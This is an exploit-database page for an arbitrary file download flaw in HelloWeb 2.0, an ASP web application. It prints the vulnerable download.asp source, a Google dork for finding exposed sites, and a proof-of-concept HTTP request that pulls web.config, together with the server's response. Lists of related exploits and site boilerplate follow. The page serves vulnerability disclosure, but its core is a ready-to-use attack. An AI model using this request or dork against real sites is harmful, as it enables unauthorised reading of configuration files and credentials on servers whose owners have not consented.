Become a patron and gain access to the dashboard, Schedule scan, API and Search

Search for hundreds of thousands of exploits

"HelloWeb 2.0 - Arbitrary File Download"

Author

Exploit author

bRpsd

Platform

Exploit platform

asp

Release date

Exploit published date

2020-07-10

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
# Exploit Title: HelloWeb 2.0 - Arbitrary File Download
# Date: 2020-07-09
# Vendor Homepage: https://helloweb.co.kr/
# Version: 2.0 [Latest] and previous versions
# Exploit Author: bRpsd
# Contact Author: cy[at]live.no
# Google Dork: inurl:exec/file/download.asp
# Type: WebApps / ASP
-----------------------------------------------------



Vulnerable code:
######################################################################################################
Dim filepath, filename, root_path, fso, root_folder, attachfile, objStream, strFile

filepath = Request.QueryString("filepath")
filename = Request.QueryString("filename")
filepath = Replace(filepath,"/","\")

root_path = server.MapPath("/")
Set fso = CreateObject("Scripting.FileSystemObject")
Set root_folder = fso.GetFolder(root_path)

attachfile = root_path & filepath & "\" & filename

Response.Clear
Response.ContentType = "application/unknown"
Response.AddHeader "Pragma", "no-cache"
Response.AddHeader "Expires", "0"
Response.AddHeader "Content-Transfer-Encoding", "binary"
Response.AddHeader "Content-Disposition","attachment; filename = " & Server.URLPathEncode(filename)

Set objStream = Server.CreateObject("ADODB.Stream")
objStream.Open

objStream.Type = 1
objStream.LoadFromFile attachfile

Response.BinaryWrite objStream.Read
Response.Flush
######################################################################################################

Vulnerability: Arbitrary File Download
Location: http://localhost/exec/file/download.asp
Parameters: filename & filepath

Proof of concept:

GET /exec/file/download.asp?filepath=/&filename=web.config HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1

RESPONSE:
HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Type: application/unknown; Charset=utf-8
Expires: 0,Thu, 09 Jul 2020 10:51:14 GMT
Server:
Content-Transfer-Encoding: binary
Content-Disposition: attachment; filename = web.config
Set-Cookie: ASPSESSIONIDQQCBDRBB=BEMDPMDDKFHNFKFMJGHIKKKI; path=/
Access-Control-Allow-Origin: *
x-xss-protection: 1; mode=block
Date: Thu, 09 Jul 2020 10:51:14 GMT
Connection: close
Release Date Title Type Platform Author
2020-10-16 "Seat Reservation System 1.0 - Remote Code Execution (Unauthenticated)" webapps php "Rahul Ramkumar"
2020-10-16 "Hotel Management System 1.0 - Remote Code Execution (Authenticated)" webapps php Aporlorxl23
2020-10-16 "Restaurant Reservation System 1.0 - 'date' SQL Injection (Authenticated)" webapps php b1nary
2020-10-16 "aaPanel 6.6.6 - Privilege Escalation & Remote Code Execution (Authenticated)" webapps python "Ünsal Furkan Harani"
2020-10-16 "Employee Management System 1.0 - Authentication Bypass" webapps php "Ankita Pal"
2020-10-16 "Company Visitor Management System (CVMS) 1.0 - Authentication Bypass" webapps php "Oğuz Türkgenç"
2020-10-16 "Employee Management System 1.0 - Cross Site Scripting (Stored)" webapps php "Ankita Pal"
2020-10-16 "Alumni Management System 1.0 - Authentication Bypass" webapps php "Ankita Pal"
2020-10-16 "CS-Cart 1.3.3 - authenticated RCE" webapps php 0xmmnbassel
2020-10-16 "Seat Reservation System 1.0 - Unauthenticated SQL Injection" webapps php "Rahul Ramkumar"
Release Date Title Type Platform Author
2020-07-10 "HelloWeb 2.0 - Arbitrary File Download" webapps asp bRpsd
2020-03-16 "Enhanced Multimedia Router 3.0.4.27 - Cross-Site Request Forgery (Add Admin)" webapps asp "Miguel Mendez Z"
2020-01-24 "OLK Web Store 2020 - Cross-Site Request Forgery" webapps asp "Joel Aviad Ossi"
2019-12-18 "Rumpus FTP Web File Manager 8.2.9.1 - Reflected Cross-Site Scripting" webapps asp "Harshit Shukla"
2019-11-18 "Crystal Live HTTP Server 6.01 - Directory Traversal" webapps asp "numan türle"
2019-08-16 "Web Wiz Forums 12.01 - 'PF' SQL Injection" webapps asp n1x_
2019-05-06 "microASP (Portal+) CMS - 'pagina.phtml?explode_tree' SQL Injection" webapps asp "felipe andrian"
2019-02-12 "Skyworth GPON HomeGateways and Optical Network Terminals - Stack Overflow" dos asp "Kaustubh G. Padwad"
2018-11-05 "Advantech WebAccess SCADA 8.3.2 - Remote Code Execution" webapps asp "Chris Lyne"
2018-05-29 "IssueTrak 7.0 - SQL Injection" webapps asp "Chris Anastasio"
Release Date Title Type Platform Author
2020-07-10 "HelloWeb 2.0 - Arbitrary File Download" webapps asp bRpsd
2017-08-15 "ClipBucket 2.8.3 - Multiple Vulnerabilities" webapps php bRpsd
2016-08-08 "Navis Webaccess - SQL Injection" webapps jsp bRpsd
2016-06-27 "OPAC KpwinSQL - SQL Injection" webapps php bRpsd
2015-10-23 "Subrion 3.x - Multiple Vulnerabilities" webapps php bRpsd
2015-07-29 "2Moons - Multiple Vulnerabilities" webapps php bRpsd
import requests
response = requests.get('https://www.nmmapper.com/api/v1/exploitdetails/48659/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.